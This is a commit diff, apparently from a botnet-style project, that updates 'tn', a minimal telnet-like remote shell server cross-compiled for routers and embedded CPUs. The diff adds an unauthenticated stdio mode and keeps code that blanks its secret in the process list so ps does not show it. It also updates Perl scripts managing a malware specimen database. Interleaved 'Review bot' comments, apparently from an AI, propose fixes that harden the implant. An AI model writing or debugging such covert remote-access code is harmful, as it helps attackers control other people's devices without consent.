Commit 1d56b4d1 authored by The White Team's avatar The White Team

implement a "local mode" for tn, using a scary goto. that will be used by nodes to scan themselves without dealing with any crypto.
remove c++ stuff from tn binary, for a record low size:

-rwx------ 1 root root 6262 Nov  4 00:00 arch/armeb-sf/tn
-rwx------ 1 root root 6380 Nov  4 00:00 arch/armgeb-sf/tn
-rwx------ 1 root root 6316 Nov  4 00:00 arch/armgel-sf/tn
-rwx------ 1 root root 6172 Nov  4 00:00 arch/arm-sf/tn
-rwx------ 1 root root 8586 Nov  4 00:00 arch/mips1-sf/tn
-rwx------ 1 root root 8588 Nov  4 00:00 arch/mipsel1-sf/tn
-rwx------ 1 root root 7232 Nov  4 00:00 arch/ppc-sf/tn
-rwx------ 1 root root 5837 Nov  4 00:00 arch/sh4b-sf/tn
-rwx------ 1 root root 5773 Nov  4 00:00 arch/sh4l-sf/tn
-rwx------ 1 root root 5753 Nov  4 00:00 arch/x86/tn
parent e1a8a2d0
......@@ -32,6 +32,8 @@ use bm::specimen;
use Digest::SHA ();
use Digest::SHA3 ();
my @names;
for my $cat (0 .. $#bm::specimen::CATEGORY) {
my %indb;
{
......@@ -39,16 +41,29 @@ for my $cat (0 .. $#bm::specimen::CATEGORY) {
@indb{@sha256} = (1) x @sha256;
}
bin:
for my $bin (<specimen/$bm::specimen::CATEGORY[$cat]/*.bin>) {
(my $sha256 = $bin) =~ s%^.*/%%;
$sha256 = pack "H64", $sha256;
next if delete $indb{$sha256};
push @{ $names[$cat] }, [$bin, $sha256];
}
for my $sha256 (keys %indb) {
next if -f bm::specimen::path $cat, $sha256, "meta";
printf "removing from database: %s %s\n", $bm::specimen::CATEGORY[$cat], unpack "H*", $sha256;
sql_exec "delete from specimen where sha256 = ?", $sha256;
}
}
for my $cat (0 .. $#bm::specimen::CATEGORY) {
bin:
for (@{ $names[$cat] }) {
my ($bin, $sha256) = @$_;
bm::specimen::load $cat, $sha256, my $data;
bm::specimen::load $cat, $sha256, my $data
or die "$bin: $!\n";
length $data
or next;
or die "$bin: zero length file\n";
my $sha3_1k = Digest::SHA3::sha3_256 substr $data, 0, 1024;
......@@ -58,7 +73,8 @@ bin:
$sha3_1k;
while ($st->fetch) {
bm::specimen::load $o_cat, $o_sha256, my $o_data;
bm::specimen::load $o_cat, $o_sha256, my $o_data
or next;
if (length $o_data >= length $data) {
if ($data eq substr $o_data, 0, length $data) {
......@@ -90,10 +106,5 @@ bin:
length $data,
$cat;
}
for (keys %indb) {
printf "removing from database: %s\n", unpack "H*", $_;
sql_exec "delete from specimen where sha256 = ?", $_;
}
}
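Review bot: The glob loop that builds @names keys each file by its basename without checking that it is a hash: `(my $sha256 = $bin) =~ s%^.*/%%;` keeps the `.bin` suffix and relies on `pack "H64"` truncating to 64 nibbles, and a stray or misnamed `*.bin` (short, or containing non-hex characters) silently yields a garbage key that is then pushed into @names, compared against %indb and fed to the SHA3 prefix lookup. Validating the name up front keeps such files out of the database, for example `next unless $bin =~ m{/([0-9a-f]{64})\.bin\z}i;` followed by `my $sha256 = pack "H64", $1;` in place of the two lines above `next if delete $indb{$sha256}`. The second loop now aborts the whole rescan on a zero-length file (`die "$bin: zero length file\n"`) where it previously skipped it; if a single empty specimen is meant to stop the run, a short comment saying why would save the next reader a guess.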
......@@ -26,6 +26,7 @@ use strict;
use Socket ();
use Coro ();
use POSIX ();
use bm::socks;
use bn::io;
......
......@@ -32,6 +32,7 @@ our @CATEGORY = qw(
unknown
malware
corruptelf
corruptupx
dynamic
innocent
suspicious
......@@ -59,10 +60,13 @@ sub load($$$)
my $path = &pathbin;
open my $fh, "<:raw", $path
or die "$path: $!\n";
or return 0;
my $size = -s $fh;
$size == sysread $fh, $_[2], $size
or die "$path: short read\n";
or return 0;
1
}
1
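Review bot: With `die` replaced by `return 0`, the short-read branch (`$size == sysread ... or return 0`) returns false without touching `$!`, so a caller that reports the failure as `die "$bin: $!\n"` (as the rescan script does) prints a stale or empty errno for that case, and `$_[2]` is left holding the partial data. The sub's `sub load($$$)` line is outside the hunk, so the contract should be stated in a comment above it, e.g. `# Returns true on success, false if the file cannot be opened ($! set) or is read short ($! then not meaningful; $_[2] may hold partial data).` If the short-read case should also be reportable, setting `$!` to a fixed errno before that return (e.g. via the POSIX constants the module may already import — not visible here) would make the existing caller messages accurate.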
......
......@@ -38,6 +38,57 @@ sub new
($self, $id, $chg);
}
# same as new, but uses local .net_tn
sub new_exec
{
my ($class, $path) = @_;
socketpair $c, $s, Socket::AF_UNIX, Socket::SOCK_STREAM, 0
or return;
if (fork eq 0) {
open STDIN, "<&", fileno $s;
open STDOUT, ">&", fileno $s;
close $c;
close $s;
exec $path, "--slave", "a" x (64 + 64 + 4), 0;
POSIX::_exit 255;
}
close $s;
my $self = bless [$c, undef, $path, undef, undef, undef, undef, ""], $class;
$self->_login;
$self
}
sub _login
{
my ($self) = @_;
($self->[3], $self->[4]) = split /\//, $self->rpkt;
$self->[5] = $self->rpkt eq "\x11\x22\x33\x44" ? ">" : "<";
return unless $self->[3] =~ /^(?:14|15|16|17|18)$/;
1 while length $self->rpkt; # env, unused
1
}
sub login
{
my ($self, $resp) = @_;
my $fh = $self->[0];
bn::io::xwrite $fh, pack "C/a", $resp;
$self->_login;
}
sub rpkt
{
my $self = shift;
......@@ -92,24 +143,6 @@ sub wpack
$self->wpkt($self->pack($pack, @args));
}
sub login
{
my ($self, $resp) = @_;
my $fh = $self->[0];
bn::io::xwrite $fh, pack "C/a", $resp;
($self->[3], $self->[4]) = split /\//, $self->rpkt;
$self->[5] = $self->rpkt eq "\x11\x22\x33\x44" ? ">" : "<";
return unless $self->[3] =~ /^(?:14|15)$/;
1 while length $self->rpkt; # env, unused
1
}
sub unlink
{
my ($self, $path) = @_;
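Review bot: `if (fork eq 0)` in new_exec never detects a failed fork: `fork` returns undef on failure, and `undef eq 0` is false, so the parent path runs with no child, closes the only other end of the socketpair and then `_login` reads EOF — yet new_exec still returns a blessed object because the result of `$self->_login` is ignored (compare `login`, which does return it). The same applies when `exec $path` fails in the child (`_exit 255`) or the slave reports a version outside `14..18`: the caller gets an object whose `[3]`/`[4]` are undef. `$c` and `$s` are also used without `my`; unless they are declared earlier in the file (not visible here) that is a strict-mode error. I would check fork and propagate the login result as below; the child branch and the rest of the class are unchanged.
```perl
my ($class, $path) = @_;
my ($c, $s);
socketpair $c, $s, Socket::AF_UNIX, Socket::SOCK_STREAM, 0
    or return;
my $pid = fork;
defined $pid
    or return;             # fork failed: must not fall through to the parent path
if ($pid == 0) {
    # … unchanged: dup $s onto STDIN/STDOUT, close $c/$s, exec $path --slave, _exit 255 …
}
close $s;
my $self = bless [$c, undef, $path, undef, undef, undef, undef, ""], $class;
$self->_login
    or return;             # child gone, exec failed, or unsupported slave version
$self
```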
......
......@@ -20,6 +20,12 @@
// usage: tn port id64.secret64.port4 -- primitive telnet server
// this program was written to be as small as possible, without
// completely sacrificing performance, and provide a network
// efficient protocol at the same time. error checking is
// moved into the kernel as much as possible, and a number of
// space saving but rather dirty tricks are being used.
// 1 -- start shell
// 2 path -- open rdonly
// 3 path -- open wrcreat
......@@ -85,9 +91,17 @@
// ver 16
// "unlimited" (~8k) packet length (packet length 255 chains to next)
// accept no longer accepts multiple message packets
// minor space optimisation
// minor size optimisations
// ver 17
// increase number of distinct challenges when urandom is missing
// exit child on 0 packet, do not enter accept loop
// ver 18
// implement a "stdio" slave mode (when started with three arguments)
// a socket is expected as stdin/stdout, authentication is skipped
#define VERSION "16"
#define VERSION "18"
#include <errno.h>
#include <unistd.h>
......@@ -255,6 +269,9 @@ int main(int argc, char *argv[])
eargv[2] = argv[1];
execve(argv[0], eargv, environ);
}
syscall(SCN(SYS_umask), 0000);
// copy id + challenge-response secret from commandline.
// also space out commandline secret, to be less obvious.
// some ps versions unfortunately show the spaces.
......@@ -268,7 +285,8 @@ int main(int argc, char *argv[])
argv[2][i] = ' ';
}
syscall(SCN(SYS_umask), 0000);
if (argc == 4)
goto handle_client; // I did not know this would even be possible - but it sure saves space
int ls = tcp_socket();
......@@ -308,10 +326,8 @@ int main(int argc, char *argv[])
read(i, secret, 32);
close(i);
++secret[0];
for (i = 0; i < 31; ++i)
secret[i + 1] += secret[i];
// if urandom is not available, "increment" challenge
++((uint32_t *) secret)[0];
}
int fd = accept(0, 0, 0);
......@@ -339,6 +355,9 @@ int main(int argc, char *argv[])
if (memcmp(buffer, buffer + 33, 32))
x();
handle_client:
fd = 3; // for stdio mode
wpkt(MSG(VERSION "/" arch)); /* version/arch */
static const uint32_t endian = 0x11223344;
......@@ -594,6 +613,8 @@ int main(int argc, char *argv[])
default:
x();
}
x();
}
// keep fd open for at least 1s, also delay hack attempts
sleep_ms(1000);
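Review bot: `++((uint32_t *) secret)[0];` in the urandom-missing fallback reads and writes a 32-bit word through what is presumably a byte buffer (its declaration is outside the hunk); if `secret` is a plain `char`/`unsigned char` array that is an aliasing violation, and on the mips1 and sh4 targets listed in the commit message an unaligned `lw`/`sw` traps (SIGBUS/address error) rather than wrapping, so the challenge fallback could kill the server on those builds depending on where the linker places the array. The old byte-chaining loop had no such requirement. Either give the declaration an alignment, `static unsigned char secret[32] __attribute__((aligned(4)));`, or keep the increment in bytes: `uint32_t c; memcpy(&c, secret, 4); ++c; memcpy(secret, &c, 4);` (gcc inlines a 4-byte memcpy, so the size cost is a few instructions at most). Note also that, as before, the `read(i, secret, 32)` return value is not checked, so a short read from urandom leaves the remaining challenge bytes at whatever they were.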
......
......@@ -41,8 +41,11 @@ void kill_9(void)
#define DESTROY_SYMBOL(sym) void sym(void) __attribute ((alias ("kill_9")));
// gcc overhead, requires -nostartfiles and some tweaking. these are not called by our __uClibc_main
DESTROY_SYMBOL(_init)
DESTROY_SYMBOL(_fini)
// uclibc overhead
DESTROY_SYMBOL(abort)
DESTROY_SYMBOL(abort)
DESTROY_SYMBOL(__GI_abort)
// arm eabi overhead
DESTROY_SYMBOL(__aeabi_unwind_cpp_pr0)
......